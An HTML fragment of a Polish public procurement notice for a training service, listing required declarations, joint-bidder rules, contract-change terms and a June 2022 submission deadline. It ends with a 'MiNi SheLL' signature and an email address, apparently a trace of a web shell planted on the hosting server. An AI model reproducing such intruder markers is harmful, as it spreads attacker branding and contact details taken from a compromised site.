class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na<br/>potwierdzenie spełniania<br/>warunków udziału w postępowaniu należy<br/>przedłożyć: 1) Oświadczenie - wg załącznika nr 2 do ogłoszenia (spełnienie warunków udziału w postępowaniu)2) Oświadczenie -<br/>wg załącznika nr 4 do ogłoszen</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wypełniony formularz oferty wraz z oświadczeniem dotyczącym podwykonawcy, oraz o zapoznaniu się z treścią ogłoszenia<br/>i projektem umowy, o związaniu ofertą oraz aktualności<br/>dostarczonych zaświadczeń zgodny w treści SWZ, oświadczenie Wykonawcy w zakresie wypełniania obowiązków<br/>informacyjnych RODO- załącznik nr 5, informacja o przynależności do grupy kapitałowej i braki powiązań. Program<br/>szkolenia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do<br/>reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego. W przypadku, gdy upoważnienie wynika wprost z treści<br/>umowy, umowę można dołączyć do oferty. Uwaga: Pełnomocnictwo winno być udzielone przez<br/>wszystkich wykonawców. Pełnomocnictwo należy złożyć wraz z ofertą. Wykonawcy ubiegający<br/>się wspólnie o udzielenie zamówienia ponoszą solidarnie odpowiedzialność za realizację<br/>zamówienia.2. Sposób spełnienia przez Wykonawców wspólnie ubiegających się o zamówienie<br/>warunków udziału w postępowaniu (powyższą kwestię reguluje art. 58 ustawy PZP).3. Warunek<br/>dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o<br/>którym mowa w art. 112 ust.2 pkt 2 PZP, jest spełniony, jeżeli co najmniej jeden z wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.4. W odniesieniu do warunków<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.5. W przypadku, o<br/>którym mowa w ust. 3 i 4, wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy.6. Oświadczenie i dokumenty potwierdzające brak podstaw do<br/>wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy nastąpić może m.in. w następujących przypadkach:a) przy rezygnacji albo<br/>zwiększeniu liczby osób przed rozpoczęciem zadania wynagrodzenie zostanie pomniejszone<br/>albo powiększone o iloczyn ilości osób i wynagrodzenia za jedną osobę. W każdym przypadku<br/>Wykonawca zobowiązany jest niezwłocznie powiadomić na piśmie Zamawiającego o zmianie<br/>ilości osób, Zamawiający zobowiązany jest niezwłocznie powiadomić Wykonawcę o zmianie<br/>ilości osób. b) w przypadku zmiany terminu realizacji usługi z przyczyn niezależnych od<br/>Zamawiającego i/lub Wykonawcy.c) w przypadku wystąpienia istotnej zmiany okoliczności<br/>powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było<br/>przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni<br/>od powzięcia wiadomości o tych okolicznościach. W takim wypadku Wykonawca może żądać<br/>wyłącznie wynagrodzenia należnego mu z tytułu wykonania części umowy.d) Dopuszcza się<br/>dokonywania zmian treści umowy w zakresie zmiany składu kadry szkoleniowej, przy czym<br/>zmiany te nie mogą powodować pogorszenia poziomu kwalifikacji i doświadczenia zmienionej<br/>kadry w stosunku do tej zaoferowanej w momencie podpisania umowy. Dokonane w/w zmiany<br/>nie wymagają sporządzania aneksu. Wykonawca zobowiązany jest do wcześniejszego<br/>poinformowania Zamawiającego w formie pisemnej o zaistniałych okolicznościach, które<br/>spowodowały zmiany osób prowadzących. Zamawiający zastrzega sobie, nie wyrażenie zgody na prowadzenie zajęć przez<br/>wskazaną osobę w przypadku, gdy kwalifikacje i doświadczenie takiej osoby będą niższe od proponowanych w ofercie <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia oferty dostępnego na miniPortalu. Formularz do zaszyfrowania oferty przez Wykonawcę jest dostępny dla Wykonawców na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPor</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-20 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com